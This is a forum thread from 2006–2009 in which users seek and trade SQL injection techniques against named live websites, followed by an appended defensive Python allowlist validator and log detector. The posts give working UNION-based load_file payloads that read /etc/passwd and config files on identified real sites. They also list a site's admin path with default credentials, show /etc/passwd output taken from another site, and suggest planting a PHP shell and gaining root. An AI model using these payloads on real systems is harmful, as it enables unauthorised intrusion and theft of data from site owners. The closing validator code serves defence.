How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
LIMIT and ORDER BY MySQL injection
Posted by: sqlinjection
Date: December 30, 2006 01:30AM

Hi all!

I have a website which is vulnerable to SQL injection in 2 variables, which are in a LIMIT and in an ORDER BY clauses.

This is the first step I've done in order to verify that the orderBy variable was actually vulnerable:

h t t p ://w w w .videocatwalk.com/index.php?firstRec=0&sbxModels=&orderBy='

And the reply was:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\', id DESC LIMIT 0, 15' at line 8

It is surely an ORDER BY clause.

I understand that I can try to manually find table names and columns, in this way:

&orderBy=id [if no errors, COLUMN id exists]
&orderBy=users.id [if no errors, TABLE users exists]

But how can I exploit this flaw in order to find the table name and the columns without manually attempting?

Another flaw is in the firstRec variable. It is a LIMIT flaw and it could be exploited to do an UNION SELECT query. No multiple queries are allowed, it seems... And the ';' char doesn't work. There's magic_quotes activated.

Please help me, or at least try and let us know if you find out something.

Thank you to all!

Re: LIMIT and ORDER BY MySQL injection
Posted by: kuza55
Date: December 30, 2006 04:20AM

If it's not a blind SQL query, then your best bet for finding table and column names is always to perform a UNION and select some data from the INFORMATION_SCHEMA database/views.

Just do a google search for INFORMATION_SCHEMA and you'll find some useful links.

And no matter where you are in a query, you can always do a UNION because you can just comment out everything after the injection point.

Hope that helps.

Re: LIMIT and ORDER BY MySQL injection
Posted by: sqlinjection
Date: December 30, 2006 05:49AM

Thanks for your reply.

I already knew about INFORMATION_SCHEMA, but how about seeing a practical example on that server? I couldn't exploit it!

http://www.videocatwalk.com/index.php?firstRec=0&sbxModels=&orderBy=nudity%20DESC

How would you exploit that query knowing that firstRec is a LIMIT field vulnerable and orderBy an ORDER BY?

A practical example on how to find table name and columns would be great.

Thank you so much!

Re: LIMIT and ORDER BY MySQL injection
Posted by: kuza55
Date: December 30, 2006 06:09AM

Well, it seems that you can't do anything with the orderBy parameter, because it only allows a certain number of characters, 15 in this case, which is clearly not enough. Also it seems that intval() is called on firstRec, so you're not going to have any luck there.

So from what I can see, you're not going to be able to attack that site via either of those parameters.

Re: LIMIT and ORDER BY MySQL injection
Posted by: sqlinjection
Date: December 30, 2006 07:46AM

Thank you :)

Is anybody able to do some real SQL injection on that site?

Re: LIMIT and ORDER BY MySQL injection
Posted by: sqlinjection
Date: December 30, 2006 08:31AM

There's an admin area here http://www.videocatwalk.com/adm/ (username: admin, password: admin) but it doesn't seem to work.

There's also http://www.videocatwalk.com/info.php (a phpinfo() page) and http://www.videocatwalk.com/admin/ directory, password protected.

Re: LIMIT and ORDER BY MySQL injection
Posted by: beford
Date: April 12, 2007 01:58AM

Since you can't easily hax this site, try getting in using another site hosted on the same server:

hxxp://www.vbreger.com/catalog.php?id=-1+union+select+load_file(char(47,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,47,104,116,100,111,99,115,47,118,98,114,101,103,101,114,47,99,111,110,102,105,103,47,70,117,110,99,116,105,111,110,115,47,68,97,116,101,98,97,115,101,46,112,104,112)),2,3,4,5/*
hxxp://www.vbreger.com/catalog.php?id=-1+union+select+load_file(char(47,101,116,99,47,112,97,115,115,119,100)),2,3,4,5/*
hxxp://www.vbreger.com/catalog.php?id=-1+union+select+current_user(),2,3,4,5/*
hxxp://www.vbreger.com/catalog.php?id=-1+union+select+GROUP_CONCAT(user),2,3,4,5+from+mysql.user+group+by+file_priv/*
hxxp://www.vbreger.com/catalog.php?id=-1+union+select+version(),2,3,4,5/*

It seems to be using MySQL as root@localhost, so you shouldn't have problems 'dumping' a phpshell, unless you can't find a dir with write permissions. You can try reading files from the ftvnudes dir to get database names, tables, etc. (ftvnudes.com == videocatwalk.com)

Btw, that looks like an old kernel version, you can probably get root.



Edited 2 time(s). Last edit at 04/12/2007 02:34AM by beford.

Re: LIMIT and ORDER BY MySQL injection
Posted by: Chuks
Date: August 14, 2007 01:56PM

I tried load_file on a site, like the above:

http://www.wananchi.co.ke/final/faqdetails.php?FaqID=-1%20union%20select%201,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3,4/*

Where am I going wrong, because it gives me this error:

##
# User Database
#
# Note that this file is consulted when the system is running in single-user
# mode. At other times this information is handled by one or more of:
# lookupd DirectoryServices
# By default, lookupd gets information from NetInfo, so

Re: LIMIT and ORDER BY MySQL injection
Posted by: H
Date: January 30, 2009 02:42PM

kuza55 Wrote:
-------------------------------------------------------
> And no matter where you are in a query, you can
> always do a UNION because you can just comment out
> everything after the injection point.

If you can only inject after ORDER BY then a UNION won't work, as ORDER BY has to be at the end of the query:

mysql> select * from two order by id union select * from test;
ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY

However, there is a way you can exploit an injection into an ORDER BY clause by using an if() statement to decide which column(s) to order by:

mysql> select * from two;
+------+------+
| id | data |
+------+------+
| 0 | 0 |
| 0 | 1 |
| 1 | 1 |
| 2 | 3 |
| 4 | 5 |
+------+------+
5 rows in set (0.00 sec)

mysql> select * from two order by if(1=1,id,data) desc;
+------+------+
| id | data |
+------+------+
| 4 | 5 |
| 2 | 3 |
| 1 | 1 |
| 0 | 0 |
| 0 | 1 |
+------+------+
5 rows in set (0.00 sec)

mysql> select * from two order by if(1=2,id,data) desc;
+------+------+
| id | data |
+------+------+
| 4 | 5 |
| 2 | 3 |
| 0 | 1 |
| 1 | 1 |
| 0 | 0 |
+------+------+
5 rows in set (0.00 sec)

Any subquery should be possible instead of 1=2, so this should be exploitable using tools such as FG Injector if you can cause a difference in output by changing the column ordered by.

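As an added example (not code from this thread or from the site discussed), here is the defender's side of the two parameters in this thread: the string-splicing pattern that makes ORDER BY and LIMIT injectable, beside an allowlist validator for them, reused as a detector over constructed request-log lines. The table name, the allowed columns and the log lines are assumptions; only the payload shapes come from the thread.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Columns the listing may be sorted by (assumption; the thread shows only "id" and "nudity").
ALLOWED_SORT = {"id", "nudity"}
PAGE_SIZE = 15
SORT_RE = re.compile(r"\s*([A-Za-z_]\w*)(?:\s+(ASC|DESC))?\s*", re.I)

def build_query_vulnerable(order_by, first_rec):
    """The pattern the thread attacks: request text spliced straight into ORDER BY / LIMIT."""
    return f"SELECT * FROM models ORDER BY {order_by}, id DESC LIMIT {first_rec}, {PAGE_SIZE}"

def build_query_hardened(order_by, first_rec):
    """ORDER BY identifiers and LIMIT offsets cannot be bound as prepared-statement
    parameters, so validate their shape against an allowlist instead of escaping them."""
    m = SORT_RE.fullmatch(order_by)
    if not m or m.group(1).lower() not in ALLOWED_SORT:
        raise ValueError(f"orderBy rejected: {order_by!r}")
    col, direction = m.group(1).lower(), (m.group(2) or "ASC").upper()
    if not re.fullmatch(r"\d{1,9}", first_rec.strip()):  # stricter than PHP intval()
        raise ValueError(f"firstRec rejected: {first_rec!r}")
    return f"SELECT * FROM models ORDER BY {col} {direction}, id DESC LIMIT {int(first_rec)}, {PAGE_SIZE}"

def flag_requests(log_lines):
    """Detection: return the (orderBy, firstRec) pairs the allowlist rejects, which covers
    the probes in the thread: a bare quote, if(<cond>,col1,col2) conditional ordering, and
    a UNION spliced into the LIMIT offset."""
    flagged = []
    for line in log_lines:
        qs = parse_qs(urlsplit(line.split()[1]).query)
        order_by = qs.get("orderBy", ["id"])[0]
        first_rec = qs.get("firstRec", ["0"])[0]
        try:
            build_query_hardened(order_by, first_rec)
        except ValueError:
            flagged.append((order_by, first_rec))
    return flagged

# Constructed sample access-log lines (not real traffic); the parameter names are the thread's.
SAMPLE_LOG = [
    "GET /index.php?firstRec=0&sbxModels=&orderBy=nudity%20DESC HTTP/1.1",
    "GET /index.php?firstRec=15&sbxModels=&orderBy=id HTTP/1.1",
    "GET /index.php?firstRec=0&sbxModels=&orderBy=' HTTP/1.1",
    "GET /index.php?firstRec=0&sbxModels=&orderBy=if(1=2,id,nudity)%20desc HTTP/1.1",
    "GET /index.php?firstRec=-1%20union%20select%201,2,3/*&orderBy=id HTTP/1.1",
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print("suspicious request:", hit)
```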